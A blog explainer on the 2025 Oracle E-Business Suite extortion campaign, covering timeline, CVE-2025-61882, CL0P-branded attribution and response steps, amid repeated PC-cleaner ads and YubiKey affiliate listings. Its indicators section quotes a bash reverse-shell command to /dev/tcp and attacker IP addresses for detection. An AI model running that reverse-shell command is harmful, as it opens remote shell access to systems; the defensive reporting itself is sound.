October DealsAmazon USOctober deal check: compare before you payAmazon US: current deals, useful picks and tech finds.Check DealsClean PCRecommendedOne scan can reveal what keeps slowing WindowsLook for cleanup and repair opportunities.Run ScanOctober DealsAmazon USDeal season is back - check today's better picksAmazon US: current deals, useful picks and tech finds.See Picks×
Skip to content
The Finance Base
The Money Desk · Blog
Re:

Oracle E-Business Suite Hacks: What Happened and Who Was Affected

The 2025 Oracle E-Business Suite campaign stole data from at least dozens of organizations. Here’s what is known about victims, attribution, vulnerabilities, and response.
From TheFinanceBase Team7 min to read
Special offer. See more information about Outbyte and uninstall instructions. Please review EULA and Privacy policy.

Attackers exploited vulnerabilities in customer Oracle E-Business Suite (EBS) environments and stole data from at least dozens of organizations, Google Threat Intelligence Group and Mandiant reported in October 2025. They estimated the campaign could ultimately involve more than 100 organizations, but no definitive final victim count is public. The evidence describes attacks on EBS deployments—not a breach of Oracle’s central cloud infrastructure or every Oracle customer.

What was targeted—and what was not

Oracle E-Business Suite is enterprise software used for finance, operations, manufacturing, logistics, human resources, and customer and supplier records. Organizations may operate EBS on their own infrastructure or use a hosting provider. In this campaign, the target was an EBS application environment and the data available through it. Oracle was the software vendor; the public evidence does not establish that Oracle Cloud infrastructure itself was breached.

A vulnerable EBS installation is not proof it was exploited. Exploitation does not by itself prove that data was exfiltrated, and an extortion email alone does not establish that its sender accessed the recipient’s systems.

How many organizations were affected?

Google and Mandiant said they were aware of dozens of victims. Google analyst Austin Larsen estimated that the campaign could involve more than 100 organizations, drawing on the scale of previous CL0P operations. That was a projection, not a confirmed final tally. Public reporting does not establish the total number of victims, records, or volume of stolen data. Reuters reported the estimate on October 9, 2025.

Special offer. See more information about Outbyte and uninstall instructions. Please review EULA and Privacy policy.
#1 Best Overall
Yubico - Security Key C NFC - Basic Compatibility - Multi-Factor authentication (MFA) Security Key and passkey, Connect via USB-C or NFC, FIDO Certified
  • POWERFUL SECURITY KEY: The Security Key C NFC is the essential physical passkey for protecting your digital life from phishing attacks. It ensures only you can access your accounts.
  • WORKS WITH 1000+ ACCOUNTS: Compatible with Google, Microsoft, and Apple. A single Security Key C NFC secures 100 of your favorite accounts, including email, password managers, and more.
  • FAST & CONVENIENT LOGIN: Plug in your Security Key C NFC via USB-C and tap it, or tap it against your phone (NFC) to authenticate. No batteries, no internet connection, and no extra fees required.
  • TRUSTED PASSKEY TECHNOLOGY: Uses the latest passkey standards (FIDO2/WebAuthn & FIDO U2F) but does not support One-Time Passwords. For complex needs, check out the YubiKey 5 Series.
  • BUILT TO LAST: Made from tough, waterproof, and crush-resistant materials. Manufactured in Sweden and programmed in the USA with the highest security standards.

Timeline of the 2025 EBS campaign

  • July 10, 2025: Google and Mandiant identified suspicious activity that may have been early exploitation attempts. They could not confirm that every observed event was a successful exploit.
  • August 9, 2025: Researchers assessed that exploitation of a zero-day may have begun by this date.
  • September 29, 2025: Researchers began tracking a high-volume extortion-email campaign.
  • October 2, 2025: Oracle said attackers may have exploited vulnerabilities patched in July and urged customers to apply current updates.
  • October 4, 2025: Oracle issued an emergency security alert and patch for CVE-2025-61882.
  • October 9, 2025: Google and Mandiant publicly described the campaign and said they knew of dozens of victims.
  • October 11, 2025: Oracle issued an additional EBS security alert for CVE-2025-61884.

The dates distinguish possible early activity from researchers’ assessment of likely exploitation and from the later extortion wave. Some reported activity preceded the October emergency fix; systems that remained unpatched could also face later attempts. Google and Mandiant’s campaign analysis provides their timeline.

What the vulnerability information shows

The principal publicly identified flaw was CVE-2025-61882, affecting the BI Publisher Integration component of Oracle Concurrent Processing. Oracle rated it 9.8 on CVSS 3.1 and described it as remotely exploitable over HTTP without authentication, with potential for remote code execution. The affected supported EBS versions listed in Oracle’s alert are 12.2.3 through 12.2.14. Oracle also states that the October 2023 Critical Patch Update is a prerequisite for applying the fix; administrators should check that baseline as well as the emergency patch.

Rank #2
Yubico - YubiKey 5C NFC - Multi-Factor authentication (MFA) Security Key and passkey, Connect via USB-C or NFC, FIDO Certified - Protect Your Online Accounts
  • POWERFUL SECURITY KEY: The YubiKey 5C NFC is the most versatile physical passkey, protecting your digital life from phishing attacks. It ensures only you can access your accounts
  • WORKS WITH 1000+ ACCOUNTS: Compatible with popular accounts like Google, Microsoft, and Apple. A single YubiKey 5C NFC secures 100+ of your favorite accounts, including email, password managers, and more
  • FAST & CONVENIENT LOGIN: Plug in your YubiKey 5C NFC via USB and tap it, or tap it against your phone (NFC), to authenticate. No batteries, no internet connection, and no extra fees required
  • MOST SECURE PASSKEY: Supports FIDO2/WebAuthn, FIDO U2F, Yubico OTP, OATH-TOTP/HOTP, Smart card (PIV), and OpenPGP. That means it’s versatile, working almost anywhere you need it
  • PRIMARY & SPARE KEYS: Just like having a spare house key, we recommend buying two YubiKeys - one for daily use and one as a spare. That way you’ll never get locked out of your accounts

That CVE is important, but it should not be treated as the explanation for every intrusion. Google and Mandiant observed multiple exploit chains and said the exact mapping between observed activity and particular vulnerabilities was not clear in every case. Oracle’s CVE-2025-61882 alert includes affected versions, patch guidance, and indicators.

How the extortion campaign worked

Attackers sent large numbers of messages to company executives claiming that the organization’s EBS environment had been breached and threatening to publish stolen data. Some messages included legitimate file listings from victim environments to lend credibility. A demand amount was not necessarily included in the first email. Contact addresses included [email protected] and [email protected], associated with the CL0P leak site.

Free tools Windows power users keep installed

One-click scans. No signup required.

Special offer. See more information about Outbyte and uninstall instructions. Please review EULA and Privacy policy.
Rank #3
Yubico - YubiKey 5 NFC - Multi-Factor authentication (MFA) Security Key and passkey, Connect via USB-A or NFC, FIDO Certified - Protect Your Online Accounts
  • POWERFUL SECURITY KEY: The YubiKey 5 NFC is the most versatile physical passkey, protecting your digital life from phishing attacks. It ensures only you can access your accounts
  • WORKS WITH 1000+ ACCOUNTS: Compatible with popular accounts like Google, Microsoft, and Apple. A single YubiKey 5 NFC secures 100+ of your favorite accounts, including email, password managers, and more
  • FAST & CONVENIENT LOGIN: Plug in your YubiKey 5 NFC via USB and tap it, or tap it against your phone (NFC), to authenticate. No batteries, no internet connection, and no extra fees required
  • MOST SECURE PASSKEY: Supports FIDO2/WebAuthn, FIDO U2F, Yubico OTP, OATH-TOTP/HOTP, Smart card (PIV), and OpenPGP. That means it’s versatile, working almost anywhere you need it
  • PRIMARY & SPARE KEYS: Just like having a spare house key, we recommend buying two YubiKeys - one for daily use and one as a spare. That way you’ll never get locked out of your accounts

Researchers said messages were sent using numerous compromised third-party accounts, likely with credentials obtained from infostealer logs. As a result, an email could appear to come from a legitimate but unrelated organization. Recipients should preserve the message and its full headers, record the time received, and validate any claimed filenames or samples against internal records and forensic evidence. Do not reply casually or destroy evidence; an email claim is a lead to investigate, not proof of access.

Was CL0P responsible?

The actor claimed affiliation with the CL0P extortion brand, and the campaign’s infrastructure and extortion approach overlapped with known CL0P activity. Google and Mandiant did not formally attribute the intrusions to a specific tracked threat group. They cautioned that the brand and leak site may be used by more than one actor. The evidence therefore supports “CL0P-branded” or “an actor claiming affiliation with CL0P,” not a definitive attribution to a particular group.

Rank #4
Yubico - Security Key NFC - Basic Compatibility - Multi-Factor Authentication (MFA) Key, Connect via USB-A or NFC, FIDO Certified
  • POWERFUL SECURITY KEY: The Security Key NFC is the essential physical passkey for protecting your digital life from phishing attacks. It ensures only you can access your accounts.
  • WORKS WITH 1000+ ACCOUNTS: Compatible with Google, Microsoft, and Apple. A single Security Key NFC secures 100 of your favorite accounts, including email, password managers, and more.
  • FAST & CONVENIENT LOGIN: Plug in your Security Key NFC via USB-A and tap it, or tap it against your phone (NFC) to authenticate. No batteries, no internet connection, and no extra fees required.
  • TRUSTED PASSKEY TECHNOLOGY: Uses the latest passkey standards (FIDO2/WebAuthn & FIDO U2F) but does not support One-Time Passwords. For complex needs, check out the YubiKey 5 Series.
  • BUILT TO LAST: Made from tough, waterproof, and crush-resistant materials. Manufactured in Sweden and programmed in the USA with the highest security standards.

What data may have been stolen?

Researchers described significant or mass amounts of data taken from some organizations, but public sources do not establish a standard set of stolen data or a total volume. Depending on an organization’s EBS configuration and connected systems, material potentially accessible through the environment could include employee or executive information, customer and supplier records, financial or operational documents, HR files, and other business records. That possibility does not mean each category was taken from every victim.

Keep four kinds of evidence distinct: what attackers claim to possess; file listings researchers verified as legitimate; material posted to a leak site; and access or exfiltration confirmed by the individual organization. A verified listing supports an investigation but does not, by itself, show that every listed file was removed.

Special offer. See more information about Outbyte and uninstall instructions. Please review EULA and Privacy policy.
Best Value
Yubico - YubiKey 5C - Multi-Factor authentication (MFA) Security Key and passkey, Connect via USB, FIDO Certified - Protect Your Online Accounts (5C)
  • POWERFUL SECURITY KEY: The YubiKey 5 is a versatile physical passkey that protects your digital life from phishing attacks. It ensures only you can access your accounts.
  • WORKS WITH 1000+ ACCOUNTS: Compatible with popular accounts like Google, Microsoft, and Apple. A single YubiKey 5 secures 100+ of your favorite accounts, including email, password managers, and more.
  • FAST & CONVENIENT LOGIN: Plug in your YubiKey 5 via USB and tap it to authenticate. No batteries, no internet connection, and no extra fees required.
  • MOST SECURE PASSKEY: Supports FIDO2/WebAuthn, FIDO U2F, Yubico OTP, OATH-TOTP/HOTP, Smart card (PIV), and OpenPGP. That means it’s versatile, working almost anywhere you need it.
  • BUILT TO LAST: Made from tough, waterproof, and crush-resistant materials. Manufactured in Sweden and programmed in the USA with the highest security standards.
Independent reader supportYour contribution helps us test, update, and keep practical guides available for everyone.Support on Ko-Fi

What Oracle did—and what a patch does not establish

Oracle first connected the activity to vulnerabilities addressed in July 2025, then issued the October 4 emergency alert for CVE-2025-61882 with indicators of compromise and an urgent patch recommendation. Its October 2025 Critical Patch Update incorporated fixes for that alert and the October 11 alert for CVE-2025-61884. Oracle’s update guidance is available in the October 2025 Critical Patch Update.

Applying fixes closes known vulnerabilities; it cannot establish whether an attacker got in earlier, whether data was taken, or whether credentials or persistence mechanisms remain. Organizations that patched after a suspected exposure window should pair patching with a compromise assessment.

What EBS organizations should do

  1. Inventory the environment: identify every EBS instance, its version, internet-facing endpoints, hosting provider, and the systems or data it can reach.
  2. Verify and apply updates: confirm the EBS version and prerequisite patch baseline, then apply Oracle’s October 2025 fixes and subsequent supported security updates. Coordinate with the hosting provider if it controls patching.
  3. Preserve evidence before destructive changes: retain relevant application, web-server, database, identity, and network logs; take appropriate database snapshots and system images; preserve extortion emails and headers. Document collection times and access.
  4. Hunt application and database artifacts: review EBS application and web-server logs for suspicious requests involving /OA_HTML/configurator/UiServlet, /OA_HTML/SyncServlet, and TemplatePreviewPG. Examine the XDO_TEMPLATES_B and XDO_LOBS tables for unusual templates, particularly TEMPLATE_CODE values beginning with TMP or DEF. Google and Mandiant give these example queries: SELECT * FROM XDO_TEMPLATES_B ORDER BY CREATION_DATE DESC; and SELECT * FROM XDO_LOBS ORDER BY CREATION_DATE DESC;. Adapt them to the environment and have qualified database staff assess results.
  5. Investigate execution and egress: look for suspicious Java child processes or shell execution under the EBS applmgr account, review outbound connections from EBS hosts, and restrict nonessential internet egress. Because implants may execute primarily in Java memory, include memory analysis where feasible.
  6. Contain and recover carefully: if indicators or other evidence suggest compromise, engage incident responders, isolate affected systems as appropriate, and investigate before rebuilding or deleting artifacts. Rotate exposed credentials and tokens, especially service credentials accessible from EBS hosts.
  7. Address obligations: work with legal, privacy, security, and insurance teams to determine whether notification to regulators, affected people, law enforcement, or contractual partners is required. Duties depend on the data, affected people’s locations, sector rules, contracts, and what the investigation establishes.

For hosted EBS, ask the provider for the exact version and exposure status, patch dates, preservation of relevant logs and database evidence, availability of outbound-traffic and audit data, and a written account of what access is known. Confirm in advance which party is responsible for notification decisions.

Indicators are leads, not a clean-bill-of-health test

Oracle’s alert lists indicators including 200.107.207.26 and 185.181.60.11, as well as shell activity resembling sh -c /bin/bash -i >& /dev/tcp/<address>/<port> 0>&1 and hashes associated with exploit files. Consult Oracle’s alert and Google and Mandiant’s analysis for the complete, current defensive guidance rather than relying on a static list. An indicator’s absence does not show a system is clean: infrastructure changes, logs may be incomplete, and techniques can be fileless.

What’s actually slowing this PC down?

Pick the symptom - the matching free tool is one click away.

Special offer. See more information about Outbyte and uninstall instructions. Please review EULA and Privacy policy.

Separate incident: the 2026 PeopleSoft campaign

A June 2026 campaign involving Oracle PeopleSoft is a separate incident, not a continuation of the 2025 EBS victim count. Reporting on Google and Mandiant’s findings said more than 100 organizations may have been targeted, about 68% of them colleges or universities; some blocked or remediated activity, while others were compromised and had data published on a ShinyHunters leak site. That campaign was associated with ShinyHunters, not automatically with the actor claiming CL0P affiliation in the EBS case. Higher Ed Dive’s June 2026 report covers the later PeopleSoft activity.

Product prices and availability are accurate as of the date/time indicated and are subject to change. Any price and availability information displayed on Amazon at the time of purchase will apply.

Leave a Reply

Your email address will not be published. Required fields are marked *

Special offer. See more information about Outbyte and uninstall instructions. Please review EULA and Privacy policy.

More post from the Money Desk

  1. The Money DeskBlogTheFinanceBase09 OCT 267 minMortgage Escrow FAQs: Taxes, Insurance, Shortages, and Refunds
  2. The Money DeskBlogTheFinanceBase09 OCT 265 minHow Mortgage Escrow Accounts Work and What Homeowners Pay For
  3. The Money DeskBlogTheFinanceBase09 OCT 265 minHow to Read a Stock Chart, Volume and Market-Cap Data
Recommended PC Tool
Recommended PC Tool
Windows Errors? Fix Them Before They SpreadFree repair scan
Crashes, No Sound, or Screen Glitches?Free driver scan

Two free Windows tools

One Free Minute Could Fix That PC

Before you go - each of these free tools takes about a minute and tackles what quietly slows a Windows PC down.

Special offer. View Outbyte info, uninstall instructions, EULA, and Privacy Policy.